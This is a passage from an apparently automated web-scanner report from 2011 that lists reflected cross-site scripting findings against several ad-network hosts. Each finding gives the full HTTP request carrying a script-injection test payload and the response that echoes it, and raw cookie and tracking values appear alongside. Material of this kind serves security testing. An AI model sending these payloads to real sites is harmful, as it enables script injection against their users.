!(#l)!%C9A!']N8~~~~~=)n@k=*!==!!!#G!#wj[!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=*/8f!!!#G!#wj]!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=*<57!!!#G!$1dF!,x.^!%)<k!3/P1!'#WQ!7rn@!?5%!*ERU=!w1K*!(#l)!%C9A!(9^Z~~~~~=)ndb=*/]]!!!#G!#dUS!,x.^!%)<k!2l9<!%vD]!!mT+!!5/$*ERU>!w1K*!(#l)!%C9A!(3/Z~~~~~=)nIg=*/Bb!!!#G!$,m-!,x.^!%)<k!2l9<!%vD]!!mT+!!5/$*ERU>!w1K*!(#l)!%C9A!(3/Z~~~~~=)nIg=*/Bb!!!#G!#avR!,x.^!%)<k!/pW_!%M#r!#a.3!!5/$*ERU>!w1K*!(#l)!%C9A!'UVr~~~~~=)nJc=*!G4!!!#G!$0Tm!,x.^!%)<k!30M5!%vao!(-EV!?5%!*ERU=!w1K*!(#l)!%JKf!(3U?~~~~~=)nNM=.*8W!!.vL!$.w1!,x.^!%)<k!2jZq!%v%0!4)>p!!H<'*ERU?!w1K*!(#l)!%C9A!(2_Z~~~~~=)n`L=*/XG!!!#G!$,b^!,x.^!%)<k!2Cr6!%nRd!4sox!#1g.*ERU>!w1K*!(#l)!%C9A!()+8~~~~~=)naG=)nl!!!.vL!$1dE!,x.^!%)<k
!3/P1!'#WQ!7rn@!?5%!*ERU=!w1K*!(#l)!%C9A!(9^Z~~~~~=)ndb=)no>!!.vL"; ih="b!!!#<!'s4e!!!!%=)!]+!)AU6!!!!#='htn!)AU7!!!!#=(1IK!*09R!!!!#=)![q!+[=I!!!!#=)n6E!+[>D!!!!#=)n4%!,+Yc!!!!)=)n0b!,y[%!!!!(=)man!->hZ!!!!#=(6NE!-fi6!!!!#=(8L5!-fiH!!!!#=(8HV!-ru2!!!!#=)mUu!.#:D!!!!#='htp!.XR3!!!!(=)m_O!.`.U!!!!#='htS!.g%4!!!!(=)o3I!.g%_!!!!%=)nrD!.g(s!!!!,=)o.b!.g(t!!!!%=)nv0!.g.)!!!!'=)md7!/!O+!!!!#=(aKx!/'y^!!!!#=(1IG!/+NP!!!!#=(aOb!/2Gk!!!!#=)nhw!/4Kq!!!!#=)nPm!/JVV!!!!'='jNd!/cnt!!!!$=)!Zg!/noe!!!!$=%=]O!/pW_!!!!$=)nJc!/peY!!!!#=)n-H!/pi4!!!!#=)nN$!/pid!!!!#=)nPE!/wxM!!!!$=)n(a!08vf!!!!$=)nFv!0Ehb!!!!#=)n,v!0Q8#!!!!#=)mx$!0Q[/!!!!#=)n?I!0Q]c!!!!#=%3V4!0eUu!!!!#=)Pl$!0ucs!!!!$=)n>t!0v*F!!!!#=)nLX!0w#]!!!!#=)n@k!1#Gq!!!!$=)n+(!1#HS!!!!#=)n7A!1#HT!!!!#=)n7j!1-6r!!!!$=)nAe!1@m6!!!!$=%3V#!1W47!!!!#=)Pl)!1W4@!!!!#=(1IO!1YRS!!!!$=)n'g!1Z@+!!!!#=)myI!1Z@/!!!!#=)n$<!1Z@0!!!!#=)n!o!1]f-!!!!>=)nf-!1_f$!!!!'=)n@C!1_f'!!!!)=)n=Q!1`)_!!!!#=)![y!1e75!!!!#=%3V6!1kL!!!!!$=)n3*!1qGe!!!!#=%1p'!1sCA!!!!#=)nK_!1wmg!!!!#=)![j!2*$P!!!!#=)n)2!2*,b!!!!#=(h4W!2-Vw!!!!$=)nQ@!2.uG!!!!#=)mio!2.wX!!!!#=)n#k!21R/!!!!#=)n`u!23At!!!!#=)mda!23o_!!!!'=)m[2!294N!!!!(=)mhK!2:N8!!!!#=%3UW!2=_P!!!!#=%3Vp!2Cr6!!!!$=)naG!2KhY!!!!$=)ncg!2Khp!!!!#=)nbB!2L<B!!!!#=(1ID!2N5$!!!!5=)mxw!2NGs!!!!#=)n>K!2Y#q!!!!#=(aO]!2Y$+!!!!'=)!c2!2Z9v!!!!$=)ne[!2`+,!!!!#='hw!!2g$h!!!!$=)nL.!2g$l!!!!$=)nRd!2g'^!!!!#=)ng*!2g>n!!!!$=)n,#!2gH2!!!!#='i#o!2jZq!!!!%=)n`L!2jZv!!!!$=)nVx!2j[4!!!!%=)nYA!2j[6!!!!$=)nU+!2j[@!!!!#=)n[a!2j[B!!!!#=)nUT!2jg(!!!!$=)n^V!2l9<!!!!$=)nIg!2l>@!!!!#=(aKS!2t,W!!!!$=)nF#!3!Yk!!!!$=)n*.!3$a2!!!!#=)5nT!3$vo!!!!#=)nc>!3$yw!!!!$=)n_Q!3'oN!!!!+=)nGr!3/P1!!!!#=)ndb!30M5!!!!#=)nNM!349Y!!!!#=)m[Z!34t)!!!!$=)nGH!35`n!!!!#=)nHC!36PE!!!!$=)n=x"; uid=uid=8a044d34-ad47-11e0-98d7-9bec9b275be2&_hmacv=1&_salt=1095483093&_keyid=k1&_hmac=e9bfd70fd4e5afb89d366b3b6b929ea9a1f33983; 
bh="b!!!%1!!!?J!!!!*=+40Q!!(1-!!!!/=+e?/!!*lZ!!!!#=$Wj6!!,WM!!!!#=$Wj6!!..X!!!!'=$L=p!!/GK!!!!/=+e?/!!/GR!!!!/=+e?/!!/Ju!!!!%=+40Q!!/K$!!!!*=+e?/!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2*J!!!!#=%=bB!!3ba!!!!0=,'-e!!4F0!!!!*=+e?/!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=)n!A!!J<J!!!!0=+e?/!!J<K!!!!0=+e?/!!J<O!!!!.=+e?/!!J<S!!!!0=+e?/!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!OfW!!!!$=)DMq!!PKh!!!!'=+$jA!!PL)!!!!'=+$jA!!PL`!!!!(=+$jA!!Rp$!!!!#='oUr!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!0=+e?/!!j,.!!<NC=)n!A!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!mL?!!!!#=%=pu!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!tLi!!!!#=,p*7!!t^6!!!!%=!Tiu!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#-B#!!!!#=$G#-!#.g1!!!!%=,pEK!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0[r!!!!#=#32s!#16I!!<NC=)n!A!#2%T!!!!%=)YC>!#2.i!!!!'=+$jA!#2g8!!!!#=%=bG!#2lt!!!!#=(BUr!#2m_!!!!#=(BV(!#2m`!!!!#=(C2b!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#8*]!!!!#=$G]3!#8>+!!!!#=!i9S!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#<v4!!!!#=(BU+!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#?gk!!!!#=(BV@!#C@M!!!!#=!iK@!#D`%!!!!.=+e?/!#Dri!!!!$=)YC=!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!.=+e?/!#MTF!!!!'=%=]S!#MTH!!!!0=+e?/!#MTI!!!!.=(6NF!#MTJ!!!!0=+e?/!#Nyi!!!!#=!eq^!#O@L!!<NC=):+(!#O@M!!<NC=):+(!#O_8!!!!'=$$NV!#QZ6!!!!#=(is%!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!$=)!]+!#Sq>!!!!#='>m<!#T^F!!!!#=!yv!!#TnE!!!!'=+e?/!#UDQ!!!!0=+e?/!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#X9r!!!!#=,p/l!#XF5!!!!#=%=bI!#Ym8!!!!#=(C1>!#]%`!!!!$='i$P!#]*j!!!!%=,'cs!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Up!!!!'=+e?/!#]Uq!!!!'=+e?/!#]Uy!!!!'=+e?/!#]Z!!!!!*=(5yj!#]w)!!!!,=(6NF!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^F1!!!!#=(C1Q!#^F2!!!!#=(BUC!#^cm!!!!$=+e?/!#^d6!!!!$='i$P!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-Z!!!!)=+e?/!#`-[!!!!)=+e?/!#`cS!!!!#=%id8!#aH+!!!!#
='>m<!#aP0!!!!%='7bP!#aPZ!!!!%=(C2c!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b8-!!!!%=+e?/!#b86!!!!%=+e?/!#b87!!!!%=+e?/!#b8:!!!!%=+e?/!#b8F!!!!%=+e?/!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#biv!!!!#=!iK0!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8m!!!!*=(5yj!#c8p!!!!*=(5yj!#c@(!!!!%=+e?/!#c@[!!!!#=(BU+!#cmG!!!!#=(BU+!#dCX!!!!(=*3W+!#dWf!!!!#=#mS:!#eDE!!!!$=)YX/!#eSD!!!!(=$_d[!#fFG!!!!#=#T_g!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#g)H!!!!$=+e?/!#h.N!!!!#=#M8b!#mP$!!!!$=(C6j!#nci!!!!#=$_di!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#pO,!!!!#=(CAZ!#q+A!!!!'=+e?/!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#qe/!!!!%=(bf8!#qe0!!!!%=(bf8!#r-[!!!!#=!c8Z!#rj7!!!!#=(BU+!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#sDa!!!!#=(Gfu!#s`D!!!!$=(Gfu!#s`L!!!!#=(BU+!#s`N!!!!#=(BU+!#s`O!!!!#=(BU+!#s`P!!!!#=(BU+!#sa7!!!!#=(Gfu!#sa^!!!!#=(Gfu!#sak!!!!#=(Gfu!#sfb!!!!#=(Gfu!#sli!!!!#=+%.t!#slj!!!!#=#T_f!#t>.!!!!#=(C6j!#t?S!!!!#=(bpR!#tM)!!!!%=(6NF!#tM*!!!!$=$Ju9!#uQC!!!!+='htq!#uY<!!!!#=!yv$!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#vC^!!!!%=+40Q!#w!v!!!!#=+(:i!#w3I!!!!#=(bX/!#w7%!!!!#=(bX/!#wUS!!!!0=+rZu!#wYG!!!!$=(bxK!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!#xtJ!!!!#=(C1t!$!6n!!!!$=+e?/!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$!VA!!!!#=+40Q!$!VB!!!!#=+40Q!$!]L!!!!#=(6?f!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#R7!!!!'=+e?/!$#X4!!!!#=#%VO!$#yu!!!!.=+e?/!$$I]!!!!%=+e?/!$$Ig!!!!%=+e?/!$$Il!!!!%=+e?/!$$K<!!!!#=#$.g!$'$#!!!!#=(0.`!$'%-!!!!%=)n$<!$'/S!!!!#=#mS:!$'?p!!!!#=(Gfu!$'A4!!!!#=(Gfu!$'A6!!!!#=(Gfu!$'AB!!!!#=(Gfu!$'AJ!!!!#=(Gfu!$'B'!!!!#=(Gfu!$'B)!!!!#=(Gfu!$(:q!!!!#=$Fss!$(Gt!!!!)=+e?/!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$+VB!!!!#=(1IG!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,_+!!!!%=(C2d!$,gE!!!!$=!iQt!$-rx!!!!#=$GXw!$.#F!!!!%=)I#r!$._W!!!!#='i+,
!$0Tw!!!!#=(6NF!$0V+!!!!#='htq!$35v!!!!#=(BU="; BX=edn6q5d6t078b&b=4&s=k0&t=135

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 13:49:26 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sat, 23 Jul 2011 13:49:26 GMT
Pragma: no-cache
Content-Length: 4673
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ad.yieldmanager.com/imp?8994d"-alert(1)-"ce7be5c493=1&Z=728x90&s=806254&_salt=2462607345";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Arr
...[SNIP]...

3.34. http://ads.adap.tv/beacons [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adap.tv
Path:   /beacons

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload a1f27<script>alert(1)</script>021458ba7c7 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacons?callback=jsonp1311396514352a1f27<script>alert(1)</script>021458ba7c7 HTTP/1.1
Host: ads.adap.tv
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx
Cookie: adaptv_unique_user_cookie="7419174845235780020__TIME__2011-05-10+07%3A22%3A29"; rtbData0="key=turn:value=4146544210108361256:expiresAt=Thu+Jul+28+06%3A37%3A58+PDT+2011:32-Compatible=true"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Connection: Keep-Alive
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="7419174845235780020__TIME__2011-07-22+21%3A48%3A45";Path=/;Domain=.adap.tv;Expires=Tue, 31-Mar-43 06:35:25 GMT
Content-Type: text/plain; charset=iso-8859-1
Content-Length: 792

jsonp1311396514352a1f27<script>alert(1)</script>021458ba7c7({
   "beacons":["http://load.exelator.com/load/?p=104&g=080&j=0&u=1234567&site=2222", "http://pix04.revsci.net/A11149/a4/0/0/123.302?tgt=http%3A%2F%2Fsegments.adap.tv%2Fdata%2F%3Fp%3Daudiencescience%26t
...[SNIP]...

3.35. http://adserver.adtechus.com/addyn%7C3.0%7C5298.1%7C1375467%7C0%7C154%7CADTECH [AdId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn%7C3.0%7C5298.1%7C1375467%7C0%7C154%7CADTECH

Issue detail

The value of the AdId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1753f"-alert(1)-"39746e769c6 was submitted in the AdId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn%7C3.0%7C5298.1%7C1375467%7C0%7C154%7CADTECH;AdId=1840288;BnId=-1;;loc=100;target=_blank;misc=1921254557;rdclick=http://rmedia.boston.com/RealMedia/ads/click_lx.ads/www.boston.com/lifestyle/default/L32/1921254557/RIGHT1/boston/m_smiletrain070611_ros_SKY/160x600_rosx_071211-smiletrain.html/72634857383034474942344141544233?1753f"-alert(1)-"39746e769c6 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4DDA4C606E651A440C6EAF39F00041BC

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
P3P: CP="NOI DSP DEVa OUR BUS UNI COM NAV INT"
Content-Type: application/x-javascript
Content-Length: 2220
Set-Cookie: 28969=ADCAD0B8.1C14A0.1.14FCEB.2.0.4E2AD12F.1C0F21.13705BE.14B2.1;expires=Sat, 30 Jul 2011 13:48:31 GMT;domain=adserver.adtechus.com;path=/

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
edia.boston.com/RealMedia/ads/click_lx.ads/www.boston.com/lifestyle/default/L32/1921254557/RIGHT1/boston/m_smiletrain070611_ros_SKY/160x600_rosx_071211-smiletrain.html/72634857383034474942344141544233?1753f"-alert(1)-"39746e769c6http://www.smiletrain.org?s_src=BANNER_BostonGlobe12&utm_source=Boston&utm_campaign=valueadd&utm_medium=display\" target=\"_blank\">
...[SNIP]...

3.36. http://adserver.adtechus.com/addyn%7C3.0%7C5298.1%7C1375467%7C0%7C154%7CADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn%7C3.0%7C5298.1%7C1375467%7C0%7C154%7CADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8501"-alert(1)-"733d4dc846b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn%7C3.0%7C5298.1%7C1375467%7C0%7C154%7CADTECH;AdId=1840288;BnId=-1;;loc=100;target=_blank;misc=1921254557;rdclick=http://rmedia.boston.com/RealMedia/ads/click_lx.ads/www.boston.com/lifestyle/default/L32/1921254557/RIGHT1/boston/m_smiletrain070611_ros_SKY/160x600_rosx_071211-smiletrain.html/72634857383034474942344141544233?&f8501"-alert(1)-"733d4dc846b=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4DDA4C606E651A440C6EAF39F00041BC

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
P3P: CP="NOI DSP DEVa OUR BUS UNI COM NAV INT"
Content-Type: application/x-javascript
Content-Length: 2212
Set-Cookie: 28969=ADCAD0B8.1C14A0.2.14FCEB.2.0.4E2AD12F.1C0F21.13705BE.14B2.1;expires=Sat, 30 Jul 2011 13:48:31 GMT;domain=adserver.adtechus.com;path=/

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
dia.boston.com/RealMedia/ads/click_lx.ads/www.boston.com/lifestyle/default/L32/1921254557/RIGHT1/boston/m_smiletrain070611_ros_SKY/160x600_rosx_071211-smiletrain.html/72634857383034474942344141544233?&f8501"-alert(1)-"733d4dc846b=1http://www.smiletrain.org?s_src=BANNER_BostonGlobe01&utm_source=Boston&utm_campaign=valueadd&utm_medium=display\" target=\"_blank\">
...[SNIP]...

3.37. http://api.bizographics.com/v1/profile.json [&callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the &callback request parameter is copied into the HTML document as plain text between tags. The payload 8e28a<script>alert(1)</script>86b474bc84f was submitted in the &callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoData8e28a<script>alert(1)</script>86b474bc84f&api_key=r9t72482usanbp6sphprhvun HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424053111904233404576462461660747244.html?mod=WSJ_hp_LEFTWhatsNewsCollection
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; BizoData=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; BizoNetworkPartnerIndex=3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Date: Sat, 23 Jul 2011 04:31:19 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Set-Cookie: BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe1I9O39eYN6IlExkNK7HUtFp4B4dlWpgdhVexhDCjVbgz8l3ZY0x538DagN4siiD1aaCmzSiiJQK8lykQMu396nckTo4nxwoHo0DuhotfR6IACScEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjvmjkMkiiS8VejD8obWgUyKLdJRFsRyXovJ9iinFlQOiiO0JWr1XIQIIGVUprElhipPBLVBiitkUr3XlAisVjfEisQmveluipbPDZgisKdKFtdaUcN5Mm0U2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiipErOGyEJmHzk4pTjPoYvsnwYXPBFhecOgTJVZ1mRrD6;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 552
Connection: keep-alive

dj.module.ad.bio.loadBizoData8e28a<script>alert(1)</script>86b474bc84f({"bizographics":{"location":{"code":"texas","name":"USA - Texas"},"industry":[{"code":"business_services","name":"Business Services"}],"functional_area":[{"code":"it_systems_analysts","name":"IT Syste
...[SNIP]...

3.38. http://api.bizographics.com/v1/profile.json [api_key parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload 7d991<script>alert(1)</script>e4631ba329e was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoData&api_key=r9t72482usanbp6sphprhvun7d991<script>alert(1)</script>e4631ba329e HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424053111904233404576462461660747244.html?mod=WSJ_hp_LEFTWhatsNewsCollection
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; BizoData=...[SNIP]...; BizoNetworkPartnerIndex=3

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Sat, 23 Jul 2011 04:31:21 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 84
Connection: keep-alive

Unknown API key: (r9t72482usanbp6sphprhvun7d991<script>alert(1)</script>e4631ba329e)

3.39. http://api.bizographics.com/v1/profile.redirect [api_key parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload 1ffb0<script>alert(1)</script>08b494b6eae was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?api_key=798c7ba2e6b04aec86d660f36f6341a51ffb0<script>alert(1)</script>08b494b6eae&callback_url=http://rt.legolas-media.com/lgrt?ci=1%26ei=21%26ti=95%26vi=11%26sti=53%26sei=21%26sci=1%26sai=0%26smi=0%26pbi=0%26sts=1311428797730419%26sui=8f8ac3d5-2ce2-4258-bdfe-d1053ae341c4 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoNetworkPartnerIndex=3; BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; BizoData=...[SNIP]...

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Sat, 23 Jul 2011 13:49:15 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
